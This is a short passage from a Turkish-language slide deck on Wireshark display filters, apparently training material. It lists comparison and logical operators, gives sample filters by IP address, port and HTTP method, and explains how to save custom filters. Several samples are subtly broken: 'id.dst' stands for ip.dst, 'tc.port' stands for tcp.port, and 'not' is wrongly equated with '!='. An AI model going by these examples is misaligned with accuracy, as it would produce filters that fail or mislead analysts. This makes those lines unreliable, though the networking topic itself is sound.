0
Display Filter

111. www.prismacsi.com
© All Rights Reserved.
11
1
Display Filter
• Karşılaştırma operatörleri
• eq == Eşittir
• ne != Eşit değildir
• gt > Büyüktür
• lt < Küçüktür
• ge >= Büyük eşittir
• le <= Küçük eşittir

112. www.prismacsi.com
© All Rights Reserved.
11
2
Display Filter
• Örnek
• id.dst == 192.168.5.5 # Hedef IP’si 192.168.5.5 ile ilgili paketler
• ip.addr==192.168.7.7 # Kaynak ya da hedef IP adresi 192.168.7.7 olan paketleri
• tc.port >=0 and tcp.port<=80 # TCP protokolü kullanan 0 ve 80 arasındaki portlar arasındaki
paketler
• http.request.method==GET # GET method ile gelen http paketleri

113. www.prismacsi.com
© All Rights Reserved.
11
3
Display Filter
• Mantıksal Operatörler
• and && =(ve)
• or || =(veya )
• xor ^^
• not != (değil)

114. www.prismacsi.com
© All Rights Reserved.
11
4
Display Filter
• Wireshark’ta kendi filtrelerimizi, filtreleme yaptığımız yerine sağındaki + butonu ile yapabiliriz.
• Bu oluşturduğumuz filtrede Expression yanında çıkar. Sık kullandığımız filtreleri bu şekilde
kullanabiliriz.

115. www.prismacsi.com
© All Rights Reserved.
11
5
UYGULAMALAR

116. www.prismacsi.com
© All Rights Reserved.
11
6
SORULAR?